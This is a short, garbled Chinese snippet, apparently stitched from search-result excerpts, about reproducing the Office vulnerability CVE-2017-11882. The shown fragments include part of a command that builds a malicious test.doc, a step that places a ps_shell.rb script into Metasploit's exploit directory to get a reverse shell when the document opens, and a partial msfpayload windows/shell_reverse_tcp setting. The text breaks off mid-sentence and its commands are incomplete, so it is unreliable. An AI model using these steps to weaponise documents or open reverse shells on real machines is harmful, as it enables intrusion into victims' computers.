CVE-2017-11882复现 /c calc.exe" -otest.doc 使用office打开。 0x02使用msf进一步攻击:将脚本ps_shell.rb放到metasploit exploit目录中。 我的...test.doc 成功反弹msfshell。 msf攻击载荷生成器 payload需要设置的参数:msfpayloadwindows/shell_reverse_tcpO1.4设置反弹连接的地址为IP(BackTrack 5),“X”参数表...